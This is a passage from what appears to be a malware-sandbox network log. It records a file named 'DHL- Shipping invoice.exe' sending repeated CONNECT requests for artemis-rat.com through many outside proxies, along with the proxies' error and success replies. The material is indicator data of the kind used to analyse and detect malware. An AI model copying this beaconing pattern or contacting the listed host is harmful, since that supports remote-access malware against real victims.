                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1079192.168.2.451190191.101.80.162806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.435992002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.562496901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.563175917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.562874079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.563602924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.750961065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.749779940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:15.765392065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:03.765393019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1080192.168.2.451305173.212.209.49316736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.437158108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.471822023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1081192.168.2.45134645.81.232.17615536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.438302994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1082192.168.2.453175175.183.82.22181936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.441986084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1083192.168.2.45330579.110.202.13180816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.442104101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1084192.168.2.45290591.107.180.250806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.442230940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1085192.168.2.451119203.161.30.1087656484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.443061113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.472083092 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1086192.168.2.453198203.95.198.3580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.444714069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1087192.168.2.45320347.243.114.19281806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.449899912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.757716894 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1088192.168.2.45334023.134.94.24580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.474858046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1089192.168.2.45321361.92.189.15806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.483032942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.787343025 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1090192.168.2.45333791.189.177.18931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.510811090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.734841108 CET1286INHTTP/1.1 403 Forbidden
                            Server: squid/5.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3629
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from lb1
                            X-Cache-Lookup: NONE from lb1:3128
                            Via: 1.1 lb1 (squid/5.7)
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1091192.168.2.45126088.255.102.11410826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.521502972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1092192.168.2.45327358.234.116.19781976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.523758888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1093192.168.2.453214111.90.150.10910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.524102926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1094192.168.2.452969192.252.216.8141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.538906097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1095192.168.2.45325127.96.235.171806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.538990974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1096192.168.2.452791192.154.244.9290006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.539757967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1097192.168.2.453356172.67.182.96806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.540347099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.627566099 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1098192.168.2.45325538.10.90.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.547514915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1099192.168.2.453243120.24.176.79806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.547736883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1100192.168.2.453341185.82.218.5210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.550100088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1101192.168.2.45135441.65.236.3719816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.557593107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.577481031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640784979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640968084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.640717030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.640428066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.640500069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:15.656017065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:03.718528032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1102192.168.2.451418159.223.166.2113726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.561099052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.577455997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640783072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640969038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.640716076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.640427113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.640506029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:15.656039000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
